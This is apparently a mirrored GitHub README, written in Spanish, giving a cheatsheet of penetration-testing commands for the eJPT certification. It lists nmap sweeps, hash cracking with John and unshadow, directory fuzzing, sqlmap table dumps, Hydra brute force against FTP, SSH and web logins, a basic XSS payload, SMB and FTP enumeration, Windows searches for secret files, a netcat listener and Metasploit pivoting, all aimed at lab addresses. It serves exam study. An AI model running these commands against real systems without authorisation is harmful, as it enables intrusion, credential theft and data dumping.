Giter VIP home page Giter VIP logo

ejpt-cheatsheet's Introduction

eJPT-Cheatsheet

Todos los comandos necesarios para aprobar el eJPT

Recursos que te pueden interesar:

Barrido de ping - Ping sweep

Nmap

nmap -sn 10.10.10.0/24

fping

fping -a -g 10.10.10.0/24 2>/dev/null

Password cracking

John

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Online Tools

CrackStation

Dump Hashes

unshadow

unshadow passwd shadow > hashes.txt

Fuzzing

Nmap

nmap --script=http-enum -p80 10.10.14.16 -oN webScan

wfuzz

wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ
wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ.php

dirb

dirb http://10.10.15.12

gobuster

gobuster dir -u 10.10.14.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

SQLMap

sqlmap -u "http://10.10.14.12/file.php?id=1" -p id
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname -T table_name --dump

Hydra

hydra -v -l admin -P passlist.txt ftp://192.168.0.1
hydra -v -L userlist.txt -P passlist.txt ftp://192.168.0.1
hydra -v -l root -P passwords.txt -t 1 -u 10.10.14.10 ssh
hydra http://10.10.14.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect" -L userlist.txt -P passwordslist.txt

XSS

<script>alert(xss)</script>
<h1>H1</h1>

SMB

Enumeración de SMB

smbclient -L 10.10.14.12 -N
smbmap -H 10.10.14.12 -u 'null'
nmap --script=smb-vuln* -p445 10.10.14.15 -oN smbScan
smbmap -H 10.10.14.15 -R backups -u 'null'

Acceso al recurso compartido backups

smbclient //10.10.14.15/backups

FTP

Enumeración de FTP

nmap --script=ftp-anon -p21 10.10.14.12
ftp 10.10.14.12
cd ..

FTP - Fuerza Bruta

hydra -l admin -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.1

Enumeración de windows

dir /b/s "\*.conf*"
dir /b/s "\*.txt*"
dir /b/s "\*secret*"
route print
netstat -r
fsutil fsinfo drives
wmic logicaldisk get Caption,Description,providername

Reverse Shell

nc

nc -nlvp 443

metasploit

msfconsole

Post Explotación

Pivoting

Ip Route

ip route add 10.10.16.0/24 via 10.10.16.1 dev tap0

Metasploit

run autoroute -s 10.10.16.0/24

Wireshark

ip.addr==192.168.12
ip.src == 192.168.2.11
ip.dst == 192.168.2.15

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.